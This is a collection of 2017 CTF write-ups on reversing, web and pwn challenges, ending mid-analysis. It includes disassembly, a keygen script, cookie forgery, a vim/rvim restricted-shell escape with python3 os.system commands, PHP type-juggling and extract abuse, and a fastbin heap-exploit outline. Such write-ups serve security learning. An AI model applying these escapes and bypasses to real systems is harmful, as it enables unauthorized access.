'z'│ ┌────< 0x004009ca 7e64 jle 0x400a30│ │└───> 0x004009cc 8b45ec mov eax, dword [rbp - local_14h]│ │ |│ 0x004009cf 4863d0 movsxd rdx, eax│ │ |│ 0x004009d2 488b45c0 mov rax, qword [rbp - local_40h]│ │ |│ 0x004009d6 4801d0 add rax, rdx ; '('│ │ |│ 0x004009d9 0fb600 movzx eax, byte [rax]│ │ |│ 0x004009dc 3c40 cmp al, 0x40 ; '@' ; '@'│ │┌───< 0x004009de 7e14 jle 0x4009f4│ ││|│ 0x004009e0 8b45ec mov eax, dword [rbp - local_14h]│ ││|│ 0x004009e3 4863d0 movsxd rdx, eax│ ││|│ 0x004009e6 488b45c0 mov rax, qword [rbp - local_40h]│ ││|│ 0x004009ea 4801d0 add rax, rdx ; '('│ ││|│ 0x004009ed 0fb600 movzx eax, byte [rax]│ ││|│ 0x004009f0 3c5a cmp al, 0x5a ; 'Z' ; 'Z'│ ┌─────< 0x004009f2 7e3c jle 0x400a30│ ││└───> 0x004009f4 8b45ec mov eax, dword [rbp - local_14h]│ ││ |│ 0x004009f7 4863d0 movsxd rdx, eax│ ││ |│ 0x004009fa 488b45c0 mov rax, qword [rbp - local_40h]│ ││ |│ 0x004009fe 4801d0 add rax, rdx ; '('│ ││ |│ 0x00400a01 0fb600 movzx eax, byte [rax]│ ││ |│ 0x00400a04 3c2f cmp al, 0x2f ; '/' ; '/'│ ││┌───< 0x00400a06 7e14 jle 0x400a1c│ │││|│ 0x00400a08 8b45ec mov eax, dword [rbp - local_14h]│ │││|│ 0x00400a0b 4863d0 movsxd rdx, eax│ │││|│ 0x00400a0e 488b45c0 mov rax, qword [rbp - local_40h]│ │││|│ 0x00400a12 4801d0 add rax, rdx ; '('│ │││|│ 0x00400a15 0fb600 movzx eax, byte [rax]│ │││|│ 0x00400a18 3c39 cmp al, 0x39 ; '9' ; '9'│ ┌──────< 0x00400a1a 7e14 jle 0x400a30│ │││└───> 0x00400a1c bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │││ |│ 0x00400a21 e8aafcffff call sym.imp.puts ; int puts(const char *s)│ │││ |│ 0x00400a26 bf00000000 mov edi, 0 ; int status│ │││ |│ 0x00400a2b e820fdffff call sym.imp.exit ; void exit(int status)│ └└└────> 0x00400a30 8345ec01 add dword [rbp - local_14h], 1│ ↑│ ; JMP XREF from 0x0040099f (sub.puts_977)│ |└─> 0x00400a34 8b45ec mov eax, dword [rbp - local_14h]│ | 0x00400a37 4863d0 movsxd rdx, eax│ | 0x00400a3a 488b45c0 mov rax, qword [rbp - local_40h]│ | 0x00400a3e 4801d0 add rax, rdx ; '('│ | 0x00400a41 0fb600 movzx eax, byte [rax]│ | 0x00400a44 84c0 test al, al│ └──< 0x00400a46 0f8558ffffff jne 0x4009a4│ 0x00400a4c 488b45e0 mov rax, qword [rbp - local_20h]│ 0x00400a50 8b10 mov edx, dword [rax]│ 0x00400a52 488b45e0 mov rax, qword [rbp - local_20h]│ 0x00400a56 4883c004 add rax, 4│ 0x00400a5a 8b00 mov eax, dword [rax]│ 0x00400a5c 01c2 add edx, eax│ 0x00400a5e 488b45e0 mov rax, qword [rbp - local_20h]│ 0x00400a62 4883c008 add rax, 8│ 0x00400a66 8b00 mov eax, dword [rax]│ 0x00400a68 01d0 add eax, edx│ 0x00400a6a 89c7 mov edi, eax ; int seed│ 0x00400a6c e88ffcffff call sym.imp.srand ; void srand(int seed)│ 0x00400a71 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400a75 8b18 mov ebx, dword [rax]│ 0x00400a77 e8f4fcffff call sym.imp.rand ; int rand(void)│ 0x00400a7c 29c3 sub ebx, eax│ 0x00400a7e 89d8 mov eax, ebx│ 0x00400a80 3d2a05eb55 cmp eax, 0x55eb052a│ ┌─< 0x00400a85 7414 je 0x400a9b│ │ 0x00400a87 bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400a8c e83ffcffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400a91 bf00000000 mov edi, 0 ; int status│ │ 0x00400a96 e8b5fcffff call sym.imp.exit ; void exit(int status)│ └─> 0x00400a9b 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400a9f 4883c004 add rax, 4│ 0x00400aa3 8b18 mov ebx, dword [rax]│ 0x00400aa5 e8c6fcffff call sym.imp.rand ; int rand(void)│ 0x00400aaa 29c3 sub ebx, eax│ 0x00400aac 89d8 mov eax, ebx│ 0x00400aae 3d396cf70e cmp eax, 0xef76c39│ ┌─< 0x00400ab3 7414 je 0x400ac9│ │ 0x00400ab5 bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400aba e811fcffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400abf bf00000000 mov edi, 0 ; int status│ │ 0x00400ac4 e887fcffff call sym.imp.exit ; void exit(int status)│ └─> 0x00400ac9 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400acd 4883c008 add rax, 8│ 0x00400ad1 8b18 mov ebx, dword [rax]│ 0x00400ad3 e898fcffff call sym.imp.rand ; int rand(void)│ 0x00400ad8 29c3 sub ebx, eax│ 0x00400ada 89d8 mov eax, ebx│ 0x00400adc 3d642d1ecc cmp eax, 0xcc1e2d64│ ┌─< 0x00400ae1 7414 je 0x400af7│ │ 0x00400ae3 bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400ae8 e8e3fbffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400aed bf00000000 mov edi, 0 ; int status│ │ 0x00400af2 e859fcffff call sym.imp.exit ; void exit(int status)│ └─> 0x00400af7 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400afb 4883c00c add rax, 0xc│ 0x00400aff 8b18 mov ebx, dword [rax]│ 0x00400b01 e86afcffff call sym.imp.rand ; int rand(void)│ 0x00400b06 29c3 sub ebx, eax│ 0x00400b08 89d8 mov eax, ebx│ 0x00400b0a 3df5c6b6c7 cmp eax, 0xc7b6c6f5│ ┌─< 0x00400b0f 7414 je 0x400b25│ │ 0x00400b11 bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400b16 e8b5fbffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400b1b bf00000000 mov edi, 0 ; int status│ │ 0x00400b20 e82bfcffff call sym.imp.exit ; void exit(int status)│ └─> 0x00400b25 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400b29 4883c010 add rax, 0x10│ 0x00400b2d 8b18 mov ebx, dword [rax]│ 0x00400b2f e83cfcffff call sym.imp.rand ; int rand(void)│ 0x00400b34 29c3 sub ebx, eax│ 0x00400b36 89d8 mov eax, ebx│ 0x00400b38 3dfa1b9426 cmp eax, 0x26941bfa│ ┌─< 0x00400b3d 7414 je 0x400b53│ │ 0x00400b3f bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400b44 e887fbffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400b49 bf00000000 mov edi, 0 ; int status│ │ 0x00400b4e e8fdfbffff call sym.imp.exit ; void exit(int status)│ └─> 0x00400b53 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400b57 4883c014 add rax, 0x14│ 0x00400b5b 8b18 mov ebx, dword [rax]│ 0x00400b5d e80efcffff call sym.imp.rand ; int rand(void)│ 0x00400b62 29c3 sub ebx, eax│ 0x00400b64 89d8 mov eax, ebx│ 0x00400b66 3df3f00c26 cmp eax, 0x260cf0f3│ ┌─< 0x00400b6b 7414 je 0x400b81│ │ 0x00400b6d bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400b72 e859fbffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400b77 bf00000000 mov edi, 0 ; int status│ │ 0x00400b7c e8cffbffff call sym.imp.exit ; void exit(int status)│ └─> 0x00400b81 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400b85 4883c018 add rax, 0x18│ 0x00400b89 8b18 mov ebx, dword [rax]│ 0x00400b8b e8e0fbffff call sym.imp.rand ; int rand(void)│ 0x00400b90 29c3 sub ebx, eax│ 0x00400b92 89d8 mov eax, ebx│ 0x00400b94 3defcad410 cmp eax, 0x10d4caef│ ┌─< 0x00400b99 7414 je 0x400baf│ │ 0x00400b9b bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400ba0 e82bfbffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400ba5 bf00000000 mov edi, 0 ; int status│ │ 0x00400baa e8a1fbffff call sym.imp.exit ; void exit(int status)│ └─> 0x00400baf 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400bb3 4883c01c add rax, 0x1c│ 0x00400bb7 8b18 mov ebx, dword [rax]│ 0x00400bb9 e8b2fbffff call sym.imp.rand ; int rand(void)│ 0x00400bbe 29c3 sub ebx, eax│ 0x00400bc0 89d8 mov eax, ebx│ 0x00400bc2 3d24e866c6 cmp eax, 0xc666e824│ ┌─< 0x00400bc7 7414 je 0x400bdd│ │ 0x00400bc9 bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400bce e8fdfaffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400bd3 bf00000000 mov edi, 0 ; int status│ │ 0x00400bd8 e873fbffff call sym.imp.exit ; void exit(int status)│ └─> 0x00400bdd 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400be1 4883c020 add rax, 0x20│ 0x00400be5 8b18 mov ebx, dword [rax]│ 0x00400be7 e884fbffff call sym.imp.rand ; int rand(void)│ 0x00400bec 29c3 sub ebx, eax│ 0x00400bee 89d8 mov eax, ebx│ 0x00400bf0 3d9c4589fc cmp eax, 0xfc89459c│ ┌─< 0x00400bf5 7414 je 0x400c0b│ │ 0x00400bf7 bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400bfc e8cffaffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400c01 bf00000000 mov edi, 0 ; int status│ │ 0x00400c06 e845fbffff call sym.imp.exit ; void exit(int status)│ └─> 0x00400c0b 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400c0f 4883c024 add rax, 0x24 ; '$'│ 0x00400c13 8b18 mov ebx, dword [rax]│ 0x00400c15 e856fbffff call sym.imp.rand ; int rand(void)│ 0x00400c1a 29c3 sub ebx, eax│ 0x00400c1c 89d8 mov eax, ebx│ 0x00400c1e 3d3a071324 cmp eax, 0x2413073a│ ┌─< 0x00400c23 7414 je 0x400c39│ │ 0x00400c25 bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400c2a e8a1faffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400c2f bf00000000 mov edi, 0 ; int status│ │ 0x00400c34 e817fbffff call sym.imp.exit ; void exit(int status)│ └─> 0x00400c39 90 nop│ 0x00400c3a 4883c438 add rsp, 0x38 ; '8'│ 0x00400c3e 5b pop rbx│ 0x00400c3f 5d pop rbp└ 0x00400c40 c3 ret``` There was a loop which we can ignore since it just checked for the passwords formatting that was everything from the functions entry point until 0x00400a46. The following checks looked like red herrings at first with all the calls to rand(). But, we later discovered that the seed to rand was actually from the username!In here, the function seeded srand with chars from the username, and then subtracted the output of rand() calls to 4 byte chunks of the password at a time.The result of this operation was then compared against a set of constants. What did we do? we simply dropped into gdb and used that to calculate the expected values for us.We examined $eax after returns from rand().We knew that the 4 byte chars = constant + $eax.We then converted to the integer value to a string using python by first converting the integer result to a hex value, and running chr() on each par of digits.We got that part of the password. Stepped until the comparison instruction where we set $eax to the constant to force the checks for example `set $eax = 0x55eb052a`. That wasn't the cleanest way to do this, but was the most obvious for us. In retrospect, we could have ran a C function to generate the password from us since we knew the seed. While we did this (took a long time), I had another binary which was patched to skip over the checks.The last function that was called was the flag generation function, it used the password to manipulated a hard coded string and printed a formatted password.Used that to verify that our password was correct (saved me after a few typos). The final result is as follows. ```./nochecks ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌ ▐░█▀▀▀▀▀▀▀▀▀ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▐░▌ ▐░▌ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌ ▐░▌ ▐░▌ ▐░▌ ▐░░░░░░░░░░░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ ▐░▌ ▐░▌ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▐░▌ ▐░▌ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ Welcome to Catalyst systemsLoading..............................Username: catalyst_ceoPassword: sLSVpQ4vK3cGWyW86AiZhggwLHBjmx9CRspVGggjLogging in..............................your flag is: ALEXCTF{1_t41d_y0u_y0u_ar3__gr34t__reverser__s33}```
## Challenge> Why not drop us a few lines and say hi :). ## SolutionUpon connecting to the AlexCTF IRC channel, the banner displayed the flag in plaintext. The flag is **ALEXCTF{W3_w15h_y0u_g00d_luck}**.
# Bender Safe (re, 50 points) Binary provided in challenge is 32bit MIPS, which is a bit unusual, and makes reversing harder. We can connect to challenge server, but it wants us to provide some OTP key: $ nc bender_safe.teaser.insomnihack.ch 31337 Welcome to Bender's passwords storage service Here's your OTP challenge : IMYTSAAAUI87YIQU After a while of reverse-engineering, we have found that there is only one function that matter (named aptly `validate`). Checks are performed one-by-one, but characters are checked out-of-order (so naively bruteforcing password by tracing program and counting instructions will not work). For example, second check looks like this: ```asm.text:00401E0C loc_401E0C: # CODE XREF: validate+184.text:00401E0C lw $v1, 0x60+dead($fp).text:00401E10 lw $v0, 0x60+babe($fp).text:00401E14 mult $v1, $v0.text:00401E18 mflo $v0.text:00401E1C sw $v0, 0x60+deadXbabe($fp).text:00401E20 lw $v1, 0x60+defe($fp).text:00401E24 lw $v0, 0x60+cate($fp).text:00401E28 mult $v1, $v0.text:00401E2C mflo $v0.text:00401E30 sw $v0, 0x60+defeXcate($fp).text:00401E34 lw $v1, 0x60+dead2($fp).text:00401E38 lw $v0, 0x60+beef($fp).text:00401E3C mult $v1, $v0.text:00401E40 mflo $v0.text:00401E44 sw $v0, 0x60+deadXbeef($fp).text:00401E48 lw $v1, 0x60+deadXbabe($fp).text:00401E4C lw $v0, 0x60+babe($fp).text:00401E50 divu $v1, $v0.text:00401E54 teq $v0, $zero #7.text:00401E58 mfhi $v1.text:00401E5C mflo $v0.text:00401E60 sw $v0, 0x60+var_24($fp).text:00401E64 lw $v1, 0x60+defeXcate($fp).text:00401E68 lw $v0, 0x60+cate($fp).text:00401E6C divu $v1, $v0.text:00401E70 teq $v0, $zero #7.text:00401E74 mfhi $v1.text:00401E78 mflo $v0.text:00401E7C sw $v0, 0x60+var_20($fp).text:00401E80 lw $v1, 0x60+deadXbeef($fp).text:00401E84 lw $v0, 0x60+beef($fp).text:00401E88 divu $v1, $v0.text:00401E8C teq $v0, $zero #7.text:00401E90 mfhi $v1.text:00401E94 mflo $v0.text:00401E98 sw $v0, 0x60+var_1C($fp).text:00401E9C lw $v1, 0x60+var_24($fp).text:00401EA0 lw $v0, 0x60+dead($fp).text:00401EA4 divu $v1, $v0.text:00401EA8 teq $v0, $zero #7.text:00401EAC mfhi $v1.text:00401EB0 mflo $v0.text:00401EB4 move $v1, $v0.text:00401EB8 lw $v0, 0x60+var_20($fp).text:00401EBC mult $v1, $v0.text:00401EC0 mflo $v1.text:00401EC4 lw $v0, 0x60+defe($fp).text:00401EC8 move $at, $at.text:00401ECC divu $v1, $v0.text:00401ED0 teq $v0, $zero #7.text:00401ED4 mfhi $v1.text:00401ED8 mflo $v0.text:00401EDC move $v1, $v0.text:00401EE0 lw $v0, 0x60+var_1C($fp).text:00401EE4 mult $v1, $v0.text:00401EE8 mflo $v1.text:00401EEC lw $v0, 0x60+dead2($fp).text:00401EF0 move $at, $at.text:00401EF4 divu $v1, $v0.text:00401EF8 teq $v0, $zero #7.text:00401EFC mfhi $v1.text:00401F00 mflo $v0.text:00401F04 sw $v0, 0x60+deadXbabe($fp).text:00401F08 lw $v1, 0x60+arg_4($fp).text:00401F0C lw $v0, 0x60+deadXbabe($fp).text:00401F10 addu $v0, $v1, $v0.text:00401F14 lb $v1, 0($v0).text:00401F18 lw $v0, 0x60+arg_0($fp).text:00401F1C addiu $v0, 0xF.text:00401F20 lb $v0, 0($v0).text:00401F24 beq $v1, $v0, loc_401F5C.text:00401F28 move $at, $at.text:00401F2C lui $v0, 0x48 # 'H'.text:00401F30 addiu $a0, $v0, (aNope_0 - 0x480000) # "Nope!".text:00401F34 la $v0, puts.text:00401F38 move $t9, $v0.text:00401F3C jalr $t9 ; puts.text:00401F40 move $at, $at.text:00401F44 lw $gp, 0x60+var_50($fp).text:00401F48 li $a0, 1.text:00401F4C la $v0, exit.text:00401F50 move $t9, $v0.text:00401F54 jalr $t9 ; exit.text:00401F58 move $at, $at``` This looks overwhelming, but most of the opcodes are useless. Checks was rather trivial, so instead of trying to be smart, we've just reverse engineered everything the traditional way (using IDA Pro + qemu remote debugger), and came out with this OTP generator (challenge in argv[1]): ```pythonimport sys mychars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" ss = sys.argv[1] out = '' out += ss[0] out += ss[15] if ord(ss[7]) >= 65: out += chr(ord(ss[7]) ^ 0x20)else: out += chr(ord(ss[7]) ^ 0x40) if ord(ss[3]) >= 65: ndx = mychars.find(ss[3]) ndx = (ndx + 10) % len(mychars) out += mychars[ndx]else: ndx = mychars.find(ss[3]) ndx = (ndx - 10) % len(mychars) out += mychars[ndx] if ord(ss[4]) >= 65: ndx = mychars.find(ss[4]) ndx = (ndx + 10) % len(mychars) out += mychars[ndx]else: ndx = mychars.find(ss[4]) ndx = (ndx - 10) % len(mychars) out += mychars[ndx] v25 = ord(ss[1]) - ord(ss[2])if v25 >= 0: v26 = v25else: v26 = -v25out += mychars[v26 % (len(mychars) - 1)] v25 = ord(ss[5]) - ord(ss[6])if v25 >= 0: v26 = v25else: v26 = -v25out += mychars[v26 % (len(mychars) - 1)] if ord(ss[8]) >= 65: out += chr(ord(ss[8]) ^ 0x20)else: out += chr(ord(ss[8]) ^ 0x40) print out```
##Unloadme Unload me correctly and capture the flag! We can use tools like OSRLoader to install a driver and work on it.It seems the file is protected using `Safengine (NoobyProtect SE 1.7.0.0)`But we didn't want to miss its bonus points.So we opened it in Notepad and got the flag; too easy ![capture1.png](capture1.png) The most important part is not touched by the protector engine! ![capture2.png](capture2.png) `SharfiCTF{cc043056a0a32cb5e104aeb2cf4ff7ba}` 240 points in 30 seconds!Bad design or too much points?!
Challenge: Easyauth ----------------------------------------Category: Web ----------------------------------------30 points ---------------------------------------- ```Description: Can you gain admin access to this site?http://easyauth-afee0e67.ctf.bsidessf.net file: easyauth.php ``` ``` php Login successful!</h1>\n"; print "Setting cookie: <tt>auth=$cookie</tt>\n"; } else { print "<h1>Username or password was incorrect!</h1>\n"; } print "Click here to continue!\n"; exit(0); } Setting cookie: <tt>auth=$cookie</tt> Click here to continue! if(!isset($_COOKIE['auth'])) { require_once('./login_form.php'); exit(0); } $cookie = $_COOKIE['auth']; $pairs = explode('&', $cookie); $args = array(); foreach($pairs as $pair) { if(!strpos($pair, '=')) continue; list($name, $value) = explode('=', $pair, 2); $args[$name] = $value; } $username = $args['username']; print "<h1>Welcome back, $username!</h1>\n"; if($username == 'administrator') { print "Congratulations, you're the administrator! Here's your reward:\n"; print "" . FLAG . "\n"; } else { print "It's cool that you logged in, but unfortunately we can only give the flag to 'administrator'. :(\n"; } print "Log out\n";?>```We know now that we need to log in as administrator !!!Connect to site. Congratulations, you're the administrator! Here's your reward: " . FLAG . " It's cool that you logged in, but unfortunately we can only give the flag to 'administrator'. :( Log out ```Hint: Try guest/guestWe connect to site with credentials guest:guest ``` We see the cookie appear.I modify it with the plugin Cookie+ Manager de Firefox. Knowing that we have to be logged into administrator. ```Host: easyauth-afee0e67.ctf.bsidessf.netName: authPath: /Content: username%3Dadministrator%26date%3D2017-02-13T08%3A35%3A43%2B0000%26Content raw: username%3Dadministrator%26date%3D2017-02-13T08%3A35%3A43%2B0000%26Expires: À la fin de la sessionExpires raw: 0Send for: Tout type de connexionSend for raw: falseCreated: Monday, February 13, 2017 9:34:50 AMCreated raw: 1486974889695000Last accessed: Monday, February 13, 2017 9:35:29 AMLast accessed raw: 1486974929269000HTTP only: NoHTTP only raw: falseThis domain only: NoThis domain only raw: falsePolicy: no information availablePolicy raw: 0Status: no information availableStatus raw: 0---``` Then reload the page by logging in as administrator. ```FLAG:0076ecde2daae415d7e5ccc7db909e7e```
After connecting to server with provided credentials it appears that ctfuser is restricted by means of 'rbash'. There is a well-known restricted shell escape with vim text editor. To perform first escape one required to run vim and execute following vim commands::set shell=/bin/bash:shellWe end up in unrestricted bash and able to perform various commands. After poking around we find a binary file home directory ('/home/ctfuser/flagReader') which belongs to user 'topsecretuser' and allows read access with group 'secretuser'. Suid bit is set and secretuser can only execute binary, no read or write access. There is also a flag file in root directory ('/.flag').Running sudo -l shows us that we can run only one executable with rights of secretuser, which is rvim ('/usr/bin/rvim'). Main difference of rvim vs vim is that rvim does not allow escape to shell with previosly described techincs and, on top of that, no shell commands at all.The first though after stumbling upon rvim is running embedded module such as python or lua, but ':python' and ':lua' shows that no such module installed.To list all installed features it is possible to use ':version' vim command. Examining installed features shows that only interpreter that have been installed is python3. Following chain of vim commands gives us the flag::python3 import os; os.system('mkdir /tmp/.gettheflag/'):python3 import os; os.system('/home/ctfuser/flagReader /.flag > /tmp/.gettheflag/test'):r /tmp/.gettheflag/test<span>The flag is: flag{rVim_is_no_silverbullet!!!111elf}</span>
In HTML source code:<span><script type="text/javascript" src="main.js"></span><span></script></span>In main.js:<span> if (password == "53cure" && username=="@nokh@") { alert("Awesome!"); window.open("secureflag.html"); } else { alert("Oh swap!You are close. Why cant you try again?"); }As it says, if I give @nokh@ as username, and 53cure as password, it redirects to a jpeg file, and it has flag near file's end, as binary.</span>
`memo` is a `x86_64` pwn challenge with provided `libc`. `FULL RELRO` and `PIE` is disabled. At start we should provide an username (and password). We can do the following operations: 1. Insert new memo of size 0x20 up to 4 2. Edit last memo 3. View memo by index 4. Delete memo by index 5. Change Username and Password you entered before There is also a two table (array) at `.bss` which keeps memo address and its size (<= 0x20). # VulnerabilitiesAfter analysing each function it can be seen as `memo` has multiple issues: 1. At `new_message` `0x400C52` if we enter size more than 0x20 we can overflow an heap allocation by `malloc(0x20)` with our size. **and the allocated space won't be placed in memos table** 2. At `edit_last_message` `0x400DA8` we can leak heap address after editing. 3. At `view_memo` `0x400E56` index is not checked against negative values although due to casting we can't use this infoleak. 4. At `change_password` `0x400FF6` there is an off-by-one on entering password which overwrite LSB (Least significant byte) of first (index == 0) memo size. As you may noticed we have heap overflow (via using `4` or `1`) but based on size limitation we should trick `fastbins` to own the challenge. # ExploitationFirst of all we need a fastbin free chain. So allocating two chunk both of size 0x20 and then freeing the chunks in **inverse order** gives us a fastbin free chain of size `48` (**0x30**). We can then use `1` vulnerability to overflow the heap and corrupt heap so that free chain last pointer points to our arbitrary address. **But remember we should provide our pointer in such a way that it bypasses the fastbin malloc corruption checks**. To do so we should use an address with having a metadata (address-4) of size `48`. For this case i choose memo table so if i can overwrite pointers in the table i have `infoleak + write-what-where` primitive. As i described earlier we can use password since it is located just behind the table. after overwriting the second pointer in the table and using `view_memo` i have libc leak and stack leak. Due to binary compiled with `FULL RELRO` protection, we can overwrite stack or creating a fake tls_dtors struct (but due to new protection against tls_dtors and issues in some cases i choose option 1). After leaking we can overwrite the second pointer in the table again with stack address and pwn the challenge. You can see my [exploit](sol.py)
It has source code!http://52.34.159.157/web200/source.phpVulnerability 1: extractDo not use this function on production, please.    extract($_POST<span>);Vulnerability 2: PHP type jugling error, causing MD5 magic hash work</span>        if ($password == $secret_password<span>) {          require </span>'secret.php'<span>;          </span>$hash_file = substr(md5($secret . $filename), 0, 6<span>);          if (</span>$_POST['hash'] == $hash_file<span>) {            echo </span>file_get_contents($filename<span>);          }</span><span>If md5($secret.$filename) starts like 0e1234 and $_POST['hash'] is 0, since '0' == '0e1234' in PHP, it prints file contents of $filename.Since I don't know the secret, I just brute forced without knowing the actual hash.I've attached the exploit code.</span>
# hiddensc [200] Boston Key Party 2017 pwn 200 ## Description I know I hid that pesky shellcode page somewhere… (the hidden page will change every ~~10~~ 20 minutes). Please don't brute force the hundreds of GB of space… ## First Look ### Running the Binary We're given two files, hiddensc which is the binary, and poop.sc, which is the shellcode that runs /bin/sh. Looking at the challenge description, it appears the program puts the shellcode somewhere in memory. Running the binary locally on port 9001 gives us the following output: ```$ ./hiddensc 9001 seeding with 942fa402[!] shellcode is at 0x2fa5a2820000[!] page size is 0x1000[!] pid is 29166[+] listening on 0.0.0.0 9001``` Running subsequent times shows the shellcode does move around and is exactly one page (0x1000 bytes) long. Presumably we want somehow return to the shellcode which will give us a shell on the server. ### Main Menu After we have the binary running on a port we can interact with it. The program is seemingly quite simple ```$ nc localhost 9001 [a]lloc, [j]ump : ``` We have two options, alloc and jump. Testing each option shows alloc will malloc an array of the size we request and jump will set RIP to the address we give. We also have the option to free the array we allocate, but if we choose not to we cannot free it later. ```[a]lloc, [j]ump : asz? 1234free? n [a]lloc, [j]ump : jsz? 1094795585Stopped reason: SIGSEGV0x0000000041414141 in ?? ()``` Running the binary in gdb and connecting shows the program does let us jump to any address we want. Problem is the shellcode moves around every 20 minutes on the remote server, and we can't possibly bruteforce the entire 64-bit address space. ## Initial Reverse Engineering ### Static Analysis From here I starting reverse engineering the binary in GDB. First I took a look at the randomness to see if there was a way to predict where the shellcode ended up in memory. A few lines in main stood out to me as being relevant to how the program picked an address to place the shellcode at. ```0x5555555554aa <+157>: call 0x5555555559bd <do_srand>0x5555555554af <+162>: call 0x5555555553b5 <rand64> ... 0x5555555554d7 <+202>: movabs rdx,0x5555555555550x5555555554e1 <+212>: imul rax,rdx0x5555555554e5 <+216>: sub rcx,rax0x5555555554e8 <+219>: mov rax,rcx0x5555555554eb <+222>: mov edx,DWORD PTR [rbp-0x45c]0x5555555554f1 <+228>: neg edx0x5555555554f3 <+230>: movsxd rdx,edx0x5555555554f6 <+233>: and rax,rdx0x5555555554f9 <+236>: mov QWORD PTR [rbp-0x448],rax ... 0x55555555556e <+353>: movsxd rsi,eax # Length (0x1000)0x555555555571 <+356>: mov rax,QWORD PTR [rbp-0x448]0x555555555578 <+363>: mov edx,DWORD PTR [rbp-0x458]0x55555555557e <+369>: mov r9d,0x0 # Offset0x555555555584 <+375>: mov r8d,edx # fd0x555555555587 <+378>: mov ecx,0x2 # Flags0x55555555558c <+383>: mov edx,0x5 # Protections0x555555555591 <+388>: mov rdi,rax # Address0x555555555594 <+391>: call 0x555555554f40 <mmap@plt>``` Based on the assembly it looks like the shellcode is placed at a random address between 0x0 and 0x555555555555 or so. The program mmaps a page with execute permissions and puts the shellcode there. ### Dynamic Analysis To start the dynamic analysis, I first took a look at the layout of memory to see how the shellcode page fit in with everything else in memory. ```gdb-peda$ info proc mappingsprocess 29175Mapped address spaces: Start Addr End Addr Size Offset objfile 0x2fa5a2820000 0x2fa5a2821000 0x1000 0x0 /home/.../poop.sc 0x555555554000 0x555555556000 0x2000 0x0 /home/.../hiddensc 0x555555756000 0x555555757000 0x1000 0x2000 /home/.../hiddensc 0x555555757000 0x555555758000 0x1000 0x3000 /home/.../hiddensc 0x555555758000 0x555555779000 0x21000 0x0 [heap] 0x7ffff71da000 0x7ffff71e4000 0xa000 0x0 /lib/x86_64-linux-gnu/libnss_files-2.19.so 0x7ffff71e4000 0x7ffff73e3000 0x1ff000 0xa000 /lib/x86_64-linux-gnu/libnss_files-2.19.so 0x7ffff73e3000 0x7ffff73e4000 0x1000 0x9000 /lib/x86_64-linux-gnu/libnss_files-2.19.so 0x7ffff73e4000 0x7ffff73e5000 0x1000 0xa000 /lib/x86_64-linux-gnu/libnss_files-2.19.so 0x7ffff73e5000 